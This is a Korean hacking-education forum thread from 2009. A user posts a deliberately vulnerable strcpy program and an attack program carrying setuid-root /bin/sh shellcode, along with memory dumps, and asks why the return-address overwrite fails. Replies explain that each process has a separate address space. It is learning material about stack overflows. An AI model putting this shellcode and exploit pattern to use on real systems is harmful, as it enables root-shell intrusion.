시스템 해킹

1574,

71/79

answp

http://a

시스템 해킹 시도 했는데 실패한 이유를 모르겠습니다ㅠㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1003 [복사]

/* a.c 코드 입니다.*/
#include <stdio.h>
#include "dumpcode.h"
#include <stdlib.h>

int main(int argc, char *argv[])
{
  char buf[10];
  strcpy(buf, argv[1]);
  dumpcode(buf, 100);
  return 0;
}

/* attack.c 코드 입니다.*/

#include <stdio.h>
#include <stdlib.h>
#include "dumpcode.h"

int main(void)
{
  char shellcode[]="\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int addr;
  char buffer[1024];
  int num=28;

  memset(buffer, 0, 1024);
  memset(buffer, 'A', num);

  addr=(int)shellcode;
  buffer[num++]=addr & 0xff;
  buffer[num++]=(addr>>8) & 0xff;
  buffer[num++]=(addr>>16) & 0xff;
  buffer[num++]=(addr>>24) & 0xff;

  dumpcode(shellcode, 100);
  execl("./a", "./a", buffer, NULL);
  return 0;
}

[root@localhost test]$ ./attack
0xbfffdfa0  31 c0 b0 31 cd 80 89 c3 89 c1 31 c0 b0 46 cd 80   1..1......1..F..
0xbfffdfb0  eb 1f 5e 89 76 08 31 c0 88 46 07 89 46 0c b0 0b   ..^.v.1..F..F...
0xbfffdfc0  89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd   ...N..V...1...@.
0xbfffdfd0  80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68 00 04 08   ....../bin/sh...
0xbfffdfe0  60 53 01 40 2c 87 04 08 08 e0 ff bf 74 55 01 42   `S.@,.......tU.B
0xbfffdff0  01 00 00 00 34 e0 ff bf 3c e0 ff bf 2c 58 01 40   ....4...<...,X.@
0xbfffe000  01 00 00 00                                       ....

0xbfffdf30  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
0xbfffdf40  41 41 41 41 41 41 41 41 41 41 41 41 a0 df ff bf   AAAAAAAAAAAA....
0xbfffdf50  00 00 00 00 94 df ff bf a0 df ff bf 2c 58 01 40   ............,X.@
0xbfffdf60  02 00 00 00 e4 82 04 08 00 00 00 00 05 83 04 08   ................
0xbfffdf70  92 85 04 08 02 00 00 00 94 df ff bf d4 85 04 08   ................
0xbfffdf80  04 86 04 08 60 c6 00 40 8c df ff bf 00 00 00 00   ....`..@........
0xbfffdf90  02 00 00 00                                       ....
Illegal instruction
[root@localhost test]$

불법 명령어라고 나오면서 안됩니다. 공격을 자동으로 막고 있는건지
아님 다른 이유로 실패한건지... 왜 실패 했는지 이유가 궁금합니다.
참로고 레드햇 7,9 에서 둘다 실험 해봤습니다. RET 변조 확실히 됐구요.
shellcode 배열을 전역 변수로 변경 하고도 했는데 안됩니다.
원래코드는 jmp * $esp 코드주소를 넣어서 하던데 저는 그걸 뺴고 시도
해본 겁니다. 왜 실패 했는지 이유를 알고 싶습니다.

Hit : 4255 Date : 2009/01/11 04:58


md.house	어제도 그러더니, 제가 답변만 달면 글을 지우시네요?	2009/01/11
answp	님이 말씀 한거 다 해봤는데도 안됩니다.	2009/01/11
md.house	제가 지금 해봤는데, RET 변조는 됐는데 RET 가 가르키는 주소에 실행가능한 코드가 들어있지 않네요. 제가 얘기했던 2번째 이유였는데요. 저 해킹 해볼만큼 해본 사람입니다. 제가 세상 모든 일을 다 아는것도 아니고 항상 옳은것도 아니지만, 이 분야에서는 님이 저를 믿어도 될것 같은데요.	2009/01/11
answp	RET 가르키는 주소에 코드는 확실히 있습니다. 첫번째 dumpcode 결과 보시면 메모리에 기계어 코드가 들어가 있는게 확실히 보입니다.	2009/01/11
md.house	RET 가 가르키는 주소에 코드는 없습니다. 0xbffffda0 을 말씀하시는거라면, RET 위치를 잘못 계산했습니다.	2009/01/11
answp	bffffda0 가 아니라 bfffdfa0 입니다. 아깐 실행 가능한 코드가 없다고 하셨잖아요 bfffdfa0부분 보면 shellcode 가 있습니다. 그리고 bfffdfa0를 리턴 어드레스 부분에 안넣고 jmp * $esp 넣으면 성공합니다. 단지 왜 bfffdfa0넣었을땐 왜 안될까가 궁금한거죠	2009/01/11
sjh21a	attack buffer != a buffer	2009/01/12
sjh21a	각 프로세스는 각각의 가상 메모리 공간을 갖습니다.	2009/01/12
hahah	쉘코드는 attack에서만 존재하는 변수일뿐이죠. execl로 a를 실행하면 그 변수는 더이상 존재하지 않습니다. a.c에 있는 dumpcode출력을 좀더 해보세요. 0xbfffdfa0엔 쉘코드 없을겁니다.	2009/01/12
answp	오ㅡㅡ 적어도 이런 답 을 원했다구요~	2009/01/12
answp	근데 어째서 레드햇7에선 eggshell 로는 성공을 할까요? eggshell 이랑 a.c 파일이랑 메모리가 다를텐데요	2009/01/12